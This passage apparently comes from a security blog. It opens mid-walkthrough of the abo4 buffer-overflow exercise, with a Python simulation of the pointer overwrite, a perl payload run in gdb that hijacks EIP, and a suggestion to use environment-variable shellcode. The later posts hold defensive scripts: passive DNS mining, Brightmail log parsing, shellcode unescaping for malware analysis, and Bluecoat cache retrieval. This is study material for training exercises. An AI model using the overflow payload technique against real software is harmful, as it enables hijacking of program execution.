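    struct.pack_into("<I", stack, PBUF_OFF, HEAP_ADDR)   # pbuf = malloc(...)

    # strcpy(buf, argc[1]): copies everything plus the NUL, no bounds check
    data = arg1 + b"\x00"
    stack[BUF_OFF:BUF_OFF + len(data)] = data

    # strcpy(pbuf, argc[2]): the destination is whatever pbuf holds now
    (pbuf,) = struct.unpack_from("<I", stack, PBUF_OFF)
    memory[pbuf] = (arg2 + b"\x00").ljust(4, b"\x00")

    (fn,) = struct.unpack_from("<I", memory[FN_ADDR])
    return fn

print(hex(run(b"one", b"two")))
print(hex(run(b"A" * 268 + struct.pack("<I", FN_ADDR), b"AAAA")))
```

With short arguments fn keeps pointing at puts. With a 272-byte first argument the second copy lands on fn instead of the heap.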

Keeping in mind that the variables are 268 bytes away from each other, here is a proof-of-concept demonstrating control of the EIP register. We submit the first argument (the string copied by the first strcpy) as a 272-byte string: 268 bytes of junk to reach pbuf, followed by the address of the fn pointer, which overwrites pbuf. The second argument is what gets written over fn, here 0x41414141 or “AAAA”. The third argument we’ll submit but leave alone, as it will never get used. Upon execution, the program attempts to call the value stored at fn and segfaults. Examining EIP proves our control of execution. If you want to take this one all the way, you could follow the tried-and-true technique of storing shellcode in an environment variable and determining its address with a special program, a technique I detailed in the abo1.c post I did some time ago. Happy hunting!

(gdb) run $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo4 $(perl -e 'print "A" x 268 . "\xbc\x96\x04\x08";') AAAA three

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $eip
0x41414141: Cannot access memory at address 0x41414141
(gdb) x
0x80496bc <fn>: 0x41414141

Passive DNS mining from PCAP with dpkt & Python

Update 04/14: A friend pointed me to dnssnarf, a project that looks like it was written at a DojoSec meeting by Christopher McBee and then updated a bit later on by Grant Stavely. It uses Scapy (which I hear is really neat if you haven’t played with it). Check Grant’s blog post about dnssnarf out.

So, here is another quickie in case anyone needs it out there in the Intertubes. Say you have a .pcap file, or many .pcap files, and you want to mine the DNS responses out of them so you can build up a passive DNS database and track malicious resolutions to build a list of ban-able IP addresses. This script aims to parse a given .pcap file (tcpdump/wireshark libpcap format) and returns the results of the query types you have interest in.

This script is built around dpkt, a tool by Dug Song, and the contents are heavily inspired by the tutorials present at Jon Oberheide’s site (also a developer of dpkt). Honestly, most of the time writing this was spent understanding how dpkt handled its internal data structures and how to get to the data. The documentation on dpkt is not the most mature, but the source is pretty readable if you keep the references I mention in the comments at hand. Also, this script was only tested with Python 2.6 and dpkt 1.7 on Linux. It was confirmed not to work on Windows, as dpkt appears to have some serious problems with Windows at the moment.

#!/usr/bin/env python

import dpkt, socket, sys

if len(sys.argv) != 2:
 print "Usage:\n", sys.argv[0], "filename.pcap"
 sys.exit(1)

# open in binary mode: a pcap file is not text
f = open(sys.argv[1], 'rb')
pcap = dpkt.pcap.Reader(f)

for ts, buf in pcap:
 # make sure we are dealing with IP traffic
 # ref: http://www.iana.org/assignments/ethernet-numbers
 try: eth = dpkt.ethernet.Ethernet(buf)
 except: continue
 if eth.type != 2048: continue
 # make sure we are dealing with UDP
 # ref: http://www.iana.org/assignments/protocol-numbers/
 try: ip = eth.data
 except: continue
 if ip.p != 17: continue
 # filter on UDP assigned ports for DNS
 # ref: http://www.iana.org/assignments/port-numbers
 try: udp = ip.data
 except: continue
 if udp.sport != 53 and udp.dport != 53: continue
 # make the dns object out of the udp data and check for it being a RR (answer)
 # and for opcode QUERY (I know, counter-intuitive)
 try: dns = dpkt.dns.DNS(udp.data)
 except: continue
 if dns.qr != dpkt.dns.DNS_R: continue
 if dns.opcode != dpkt.dns.DNS_QUERY: continue
 if dns.rcode != dpkt.dns.DNS_RCODE_NOERR: continue
 if len(dns.an) < 1: continue
 # now we're going to process and spit out responses based on record type
 # ref: http://en.wikipedia.org/wiki/List_of_DNS_record_types
 for answer in dns.an:
   if answer.type == 5:
     print "CNAME request", answer.name, "\tresponse", answer.cname
   elif answer.type == 1:
     print "A request", answer.name, "\tresponse", socket.inet_ntoa(answer.rdata)
   elif answer.type == 12:
     print "PTR request", answer.name, "\tresponse", answer.ptrname
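
To get from the printed lines to the passive DNS database mentioned above, one option is to aggregate them by queried name. The following is a minimal sketch in Python 3 (the script above targets Python 2), assuming the "TYPE request NAME \tresponse VALUE" line layout that the print statements produce. The names `parse_line` and `build_pdns` are hypothetical helpers, not part of dpkt.

```python
import re
from collections import defaultdict

# Matches lines such as "A request example.com \tresponse 192.0.2.10"
LINE_RE = re.compile(r'^(CNAME|A|PTR) request (\S+)\s+response (\S+)\s*$')

def parse_line(line):
    """Return (rtype, name, value) for one output line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groups() if m else None

def build_pdns(lines):
    """Map each queried name to the set of (record type, answer) pairs seen for it."""
    pdns = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip anything that is not script output
        rtype, name, value = parsed
        pdns[name.lower()].add((rtype, value))  # DNS names are case-insensitive
    return pdns

if __name__ == "__main__":
    sample = [
        "A request example.com \tresponse 192.0.2.10",
        "A request EXAMPLE.com \tresponse 192.0.2.11",
        "CNAME request www.example.com \tresponse example.com",
        "not a record line",
    ]
    for name, answers in sorted(build_pdns(sample).items()):
        print(name, sorted(answers))
```

A set is used so that repeated resolutions collapse into one entry; a real database would probably also want the packet timestamp (`ts` in the script) for first-seen and last-seen tracking.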

Symantec Brightmail syslog message parser

Ok, this will not be interesting to most of you folks that are subscribed (all three of you [hi Mom!]) but I’m hoping Google will get it and then if anyone needs this script, it’ll be there to help them.

This is just a simple log parser for the really, really annoying multi-line/multi-message format that Symantec Brightmail insists on using when it sends syslog information.

The key points: set your $delimiter and $nullvalue appropriately, and note that fields where Brightmail may log multiple messages (like the IRCPTACTION field, which basically records whether the message was delivered to each individual recipient) are sub-divided with commas. This is OK: I verified over a large sample that those fields never normally contain a comma, so you should be able to deal with that just fine if you want to script against the results.

Questions? Comment away. I check ’em.

use strict;
use Carp;

my ($in, $out) = @ARGV;
my $DEBUG=0;
my $line;

croak "\nPlease specify input & output files.  Usage\n\n\t$0 infile outfile\n\n" if (!$in or !$out);
croak "\nABORTED: Input and output files are the same: $in\n\n" if ($in eq $out);

open INFILE, $in or die $!;
open OUTFILE, ">$out" or die $!;

my %result_hash = ();
my $delimiter = "~!^!~"; # I use something weird because the subject line could have anything
my $nullvalue = "NULL";

foreach $line (<INFILE>) {
  chomp($line);
  # print "\$line = $line\n";

  # Discard lines that are not from bmserver or ecelerity (the two Brightmail components)
  unless ($line =~ /bmserver:/ || $line =~ /ecelerity:/) { next; }

  # split on pipes "|" to process further
  my ($timestuff, $UID, $msgtype, $therest) = split(/\|/, $line, 4);

  # do some basic validation of UID and msgtype fields, throwaway outliers
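  # (no \Q...\E here: quoting would match the bracket expression as a literal string;
  #  underscore is allowed so that DELIVERY_FAILURE is kept)
  if ($UID =~ /[^0-9a-z\-]/ || $msgtype =~ /[^A-Z_]/) { next; }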

  # now we parse all of this crap into a big hash
  if (exists($result_hash{$UID})) {
     if (exists($result_hash{$UID}{$msgtype})) {
        $result_hash{$UID}{$msgtype} = $result_hash{$UID}{$msgtype}.",".$therest;
     } else {
        $result_hash{$UID}{$msgtype} = $therest;
     }
  } else {
     my @timefields = split(/ +/, $timestuff);
     $result_hash{$UID}{"TIMESTAMPINT"} = $timefields[-1];
     $result_hash{$UID}{$msgtype} = $therest;
  }
}

my @recs_to_sort = ();
my @hash_elements = qw(ACCEPT ATTACH ATTACHFILTER DELIVER DELIVERY_FAILURE IRCPTACTION MSGID ORCPTS SENDER SOURCE SUBJECT TRACKERID UNSCANNABLE UNTESTED VERDICT VIRUS);
for my $key (keys %result_hash) {
  my @tmp_line = ();
  push(@tmp_line, $result_hash{$key}{"TIMESTAMPINT"});
  push(@tmp_line, $key);
  foreach my $element (@hash_elements) {
     if (exists($result_hash{$key}{$element})) {
        push(@tmp_line, $result_hash{$key}{$element});
     } else {
        push(@tmp_line, $nullvalue);
     }
  }
  push(@recs_to_sort, join($delimiter,@tmp_line));
}

# sort by time for our database inserts
my @sorted_recs = sort @recs_to_sort;

foreach (@sorted_recs) {
  print OUTFILE "$_\n";
}
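
If you want to script against the results, each output line can be split back into named fields. Here is a minimal Python sketch, assuming the default $delimiter and $nullvalue from the script above and the column order it writes (timestamp, UID, then the message types). `parse_record` and `split_multi` are hypothetical helper names, and the sample values are made up.

```python
DELIMITER = "~!^!~"   # must match $delimiter in the Perl script
NULLVALUE = "NULL"    # must match $nullvalue in the Perl script

# Column order written by the Perl script: timestamp, UID, then the message types
FIELDS = ["TIMESTAMPINT", "UID"] + (
    "ACCEPT ATTACH ATTACHFILTER DELIVER DELIVERY_FAILURE IRCPTACTION MSGID "
    "ORCPTS SENDER SOURCE SUBJECT TRACKERID UNSCANNABLE UNTESTED VERDICT VIRUS"
).split()

def parse_record(line):
    """Turn one output line into a dict; fields holding the null value become None."""
    values = line.rstrip("\n").split(DELIMITER)
    if len(values) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(values)))
    return dict((k, None if v == NULLVALUE else v) for k, v in zip(FIELDS, values))

def split_multi(value):
    """Split a comma-joined multi-message field (e.g. IRCPTACTION) into a list.

    Only apply this to fields known to be multi-valued; free-text fields
    such as SUBJECT may legitimately contain commas.
    """
    return [] if value is None else value.split(",")

if __name__ == "__main__":
    # Made-up sample row: every field null except the three set below
    row = [NULLVALUE] * len(FIELDS)
    row[0] = "1271260800"
    row[1] = "abc-123"
    row[FIELDS.index("IRCPTACTION")] = "first-value,second-value"
    record = parse_record(DELIMITER.join(row))
    print(record["UID"], split_multi(record["IRCPTACTION"]))
```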

Python Unescape 16-bit Unicode String to File

Archived here for me, maybe someone else will need it. Frequently when our analysts are doing malcode analysis, particularly on malicious PDF documents, they see shellcode in the form of 16-bit Unicode values that are then unescaped into the heap by calling the JavaScript unescape() function. Problem is, we do most of our malicious JavaScript analysis from the command line with SpiderMonkey, and it has some truncation issues with unescaping 16-bit Unicode correctly (it handles ASCII just fine). The devs are well aware of the issue, btw, so don’t bother them ;-).

So I wrote a quickie to take a string, massage it to the right byte order, and slap it to STDOUT, which the analyst can then redirect to a file or whatever. If there is a much easier way to do this, I’m all ears.

#!/usr/bin/python

import binascii
import sys
import re

# print usage if args wrong
if len(sys.argv) != 2:
  print "Usage: " + sys.argv[0] + " <string to decode>"
  print "where string is something like '%u30CC%u4560'"
  print "Keep in mind this only works for unicode 16-bit"
  print "which means 2 bytes (four hexadecimal chars with %u"
  print "in front of them)."
  sys.exit()

# convert string to upper since we don't care, and strip surrounding
# quotes first so they do not trip the validation below
string = sys.argv[1].upper().strip('"').strip("'")

# clean up the string for processing, do some rudimentary input validation
if re.findall(r'[^UA-F0-9\\%]', string):
  print "invalid string submitted\nonly the following chars are allowed:"
  print ''' % \ u U A-F a-f 0-9 ' " '''
  sys.exit()
string = re.sub(r'(%|\\)[U]', '', string)

# check one last time that we have only hex
if re.findall(r'[^A-F0-9]', string):
  print "invalid string submitted\nonly the following chars are allowed:"
  print ''' % \ u U A-F a-f 0-9 ' " '''
  sys.exit()

# split up the string, do our stuff with hex
a = list(string)
if len(a) % 4 != 0:
  print "you are missing some characters, must be in groups of 4"
  print "did your copy mess up?"
  sys.exit()
b = ""
# swap the two bytes of each 16-bit value (low byte goes first)
while len(a) > 0:
  b1 = a.pop(0) + a.pop(0)
  b2 = a.pop(0) + a.pop(0)
  b = b + b2 + b1

result = binascii.a2b_hex(b)
sys.stdout.write(result)
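
As for an easier way: one possibility is to let `struct` do the byte swap. This is a minimal sketch in Python 3 (the script above targets Python 2), assuming the input consists only of `%uXXXX` or `\uXXXX` groups, optionally wrapped in quotes. `unescape_u16` is a hypothetical name.

```python
import re
import struct

def unescape_u16(text):
    """Convert '%uXXXX' (or '\\uXXXX') escapes to bytes, low byte first."""
    cleaned = text.strip("\"'")
    units = re.findall(r'(?:%|\\)[uU]([0-9A-Fa-f]{4})', cleaned)
    # Each escape is exactly 6 characters, so any leftover means malformed input
    if len(units) * 6 != len(cleaned):
        raise ValueError("input must consist only of %uXXXX groups")
    # '<H' packs each 16-bit value little-endian, the same swap the script does by hand
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)

if __name__ == "__main__":
    print(unescape_u16("%u30CC%u4560").hex())  # prints cc306045
```

To write the raw bytes to STDOUT in Python 3, `sys.stdout.buffer.write(...)` takes the place of `sys.stdout.write(...)`.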

Bluecoat ProxySG Cache Retrieval Script in Python

So, I was actually looking at this script today and thought folks who use Bluecoat as proxies at their jobs (I get the impression that they are pretty popular) might be interested in checking it out. It’s kind of like a poor-man’s pcap solution for sites that use a robust Bluecoat proxy but don’t have pcap instrumentation everywhere.

If you give this script a URI, and a list of Bluecoat proxies, and some credentials to those proxies, it essentially goes and grabs the URI, writes it to disk and includes some information on the last time it was modified on disk, etc. Sometimes, you can use this to retrieve malicious payload that is otherwise unavailable to you due to take-down by LE or replay-filtering by the adversary.

Print usage with --help, make sure you define your setup variables appropriately before you run it, and I hope you find it useful.

#!/usr/bin/env python
# creds: I wrote most of this, only thing I used for inspiration was this HTML table parser article: http://simbot.wordpress.com/2006/05/17/html-table-parser-using-python/
# though honestly, his parser is much more feature-rich, his code taught me how the HTMLParser class works
# email me at mishley at-sign gmail dot com for cake and/or questions

import sys
import os
import urllib
from HTMLParser import HTMLParser
import optparse
import re
import time

# setup variables
default_proxies = [ "192.168.1.2", "192.168.1.3" ] # default list of proxies to use if -p is not provided
bluecoat_web_port = "3443" # web port to access bluecoat proxy web admin interface
bluecoat_web_user = "username" # username for above interface
bluecoat_web_pass = "password" # password for above interface
bluecoat_proxy_port = "3128" # proxy port to request that a proxy directly proxy a request, may also probably use 80

# parse command line args
parser = optparse.OptionParser()
parser.add_option("-u", "--uri", type="string", action="store", dest="uri", help="URI to retrieve. Must be a file object, not a directory.")
parser.add_option("-p", "--proxyip", type="string", action="append", dest="proxyip", help="Proxy IP addresses to search (defaults to all Bluecoats), can be used multiple times for multiple IP addresses. (if used more than once, --all is assumed)")
parser.add_option("-l", "--log", dest="log", action="store_true", default=False, help="Write file object metadata to log file, <filename>.log.")
parser.add_option("-a", "--all", dest="all", action="store_true", default=False, help="Grab a copy of the file from every proxy on which it is found, not just the first in the list. These files may be identical, use md5sum to check.")
options, args = parser.parse_args()

# input validation
if len(sys.argv) == 1:
	parser.print_help()
	sys.exit()
if options.proxyip and len(options.proxyip) > 1:
	options.all = True
if not options.proxyip:
	options.proxyip = default_proxies
else:
	for i in options.proxyip:
		if re.search('[^0-9\.]', i):
			parser.error("Option --proxyip must use a valid IP address, exiting.")
if not options.uri:
	parser.error("Option --uri is required for use, exiting.")

class proxyopen(urllib.FancyURLopener):
	def prompt_user_passwd(self, host, realm):
		return bluecoat_web_user, bluecoat_web_pass
	def http_error_401(self, url, fp, errcode, errmsg, headers, data=None):
		"""Error 401 -- authentication required. This function supports Basic authentication only."""
		self.tries += 1
		if self.maxtries and self.tries >= self.maxtries:
			self.tries = 0
			return self.http_error_default(url, fp, 500, "HTTPS Basic Auth timed out after "+str(self.maxtries)+" attempts.", headers)
		# URLopener must be referenced through the urllib module here;
		# its http_error_default raises IOError
		if not 'www-authenticate' in headers:
			urllib.URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		stuff = headers['www-authenticate']
		match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', stuff)
		if not match:
			urllib.URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		scheme, realm = match.groups()
		if scheme.lower() != 'basic':
			urllib.URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		name = 'retry_' + self.type + '_basic_auth'
		if data is None:
			return getattr(self,name)(url, realm)
		else:
			self.tries = 0
			return getattr(self,name)(url, realm, data)

def checkURI(uri="http://www.google.com/favicon.ico", proxyip="192.168.1.2"):
	opener = proxyopen()
	# split only on the first '//' so a path containing '//' does not break the unpacking
	protocol, domainandpath = uri.split('//', 1)
	protocol = protocol.rstrip(':')
	if protocol != 'http':
		sys.exit("Cannot process non-http requests, exiting.")
	try: page = opener.open("https://" + proxyip + ":" + bluecoat_web_port + "/CE/Info/" + protocol + "/" + domainandpath).read()
	except: return "NOCONN_0xDEADBEEF"
	if page.find('Authentication required') > -1: return "NOAUTH_0xDEADBEEF"
	if page.find('0x00000007') == -1 and page.find('CE URL Information') > -1: return page
	else: return "NOTFOUND_0xDEADBEEF"

def fdURI(uri="http://www.google.com/favicon.ico", proxyip="192.168.1.2"):
	proxy = { 'http': 'http://'+proxyip+':'+bluecoat_proxy_port }
	fd = urllib.urlopen(uri, proxies=proxy)
	return fd

class parseTable(HTMLParser):
	def __init__(self):
		HTMLParser.__init__(self)
		self.in_table = 0
		self.in_tr = 0
		self.in_td = 0
		self.tabledata = []
	def handle_starttag(self, tag, attrs):
		if tag == 'table': self.in_table = 1
		if tag == 'tr': self.in_tr = 1
		if tag == 'td': self.in_td = 1
	def handle_data(self, data):
		if self.in_td and self.in_tr and self.in_table:
			self.tabledata.append(data)
	def handle_endtag(self, tag):
		if tag == 'table': self.in_table = 0
		if tag == 'tr': self.in_tr = 0
		if tag == 'td': self.in_td = 0

if __name__ == "__main__":
	filename = options.uri.split('/')[-1]
	for proxy in options.proxyip:
		meta = checkURI(options.uri, proxy)
		if meta == "NOCONN_0xDEADBEEF":
			print "Unable to connect to proxy "+proxy+" via urllib to find URL '"+options.uri+"'."
			continue
		elif meta == "NOTFOUND_0xDEADBEEF":
			print "Unable to locate URL '"+options.uri+"' in proxy "+proxy+"."
			continue
		elif meta == "NOAUTH_0xDEADBEEF":
			print "Unable to authenticate to proxy "+proxy+"."
			continue
		else:
			fd = fdURI(options.uri, proxy)
			outstring = fd.read()
			# we are going to re-grab meta data now that we've potentially
			# modified the last-cached timestamp
			meta = checkURI(options.uri, proxy)
			tableparser = parseTable()
			tableparser.feed(meta)
			tableparser.close()
			parsed = tableparser.tabledata
			tableparser = None
			lastretrieved = time.strftime("%Y%m%d_%H:%M:%S_UTC", time.strptime(' '.join(parsed[9].split()[2:4]), "%m/%d/%Y %H:%M:%S"))
			fullname = filename+"_"+proxy+"_"+lastretrieved
			outfile = open(fullname, 'wb')
			outfile.write(outstring)
			outfile.close()
			fd.close()
			print "Downloaded file '"+fullname+"' successfully."
			if options.log:
				logfile = open(fullname+".log", 'wb')
				j = 0
				for i in parsed:
					j = j + 1
					if j % 2 == 0: logfile.write(i+"\n")
					else: logfile.write(i+" :: ")
				logfile.close()
				print "Successfully wrote metadata to file '"+fullname+".log'."
			if options.all: continue
			else: break
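
The metadata log written above relies on the table cells alternating between a label and its value. Here is a minimal sketch of that idea in Python 3 (the script above targets Python 2, where the module is called `HTMLParser`). `CellCollector`, `pair_cells`, and the sample HTML are hypothetical and are not meant to reflect the actual Bluecoat page layout. Unlike `parseTable`, this version joins all text inside one `<td>` into a single entry, which is an assumption about what is wanted rather than what the script does.

```python
from html.parser import HTMLParser

class CellCollector(HTMLParser):
    """Collect the text of every <td> cell, in document order."""
    def __init__(self):
        super().__init__()
        self.in_td = False
        self.cells = []

    def handle_starttag(self, tag, attrs):
        if tag == "td":
            self.in_td = True
            self.cells.append("")   # start a new, empty cell

    def handle_endtag(self, tag):
        if tag == "td":
            self.in_td = False

    def handle_data(self, data):
        if self.in_td:
            self.cells[-1] += data  # a cell's text may arrive in several chunks

def pair_cells(html):
    """Return [(label, value), ...] from alternating table cells."""
    parser = CellCollector()
    parser.feed(html)
    parser.close()
    cells = [c.strip() for c in parser.cells]
    return list(zip(cells[0::2], cells[1::2]))

if __name__ == "__main__":
    # Made-up sample page with two label/value rows
    sample = ("<table><tr><td>URL</td><td>http://example.com/a.bin</td></tr>"
              "<tr><td>Size</td><td>1024</td></tr></table>")
    for label, value in pair_cells(sample):
        print(label + " :: " + value)
```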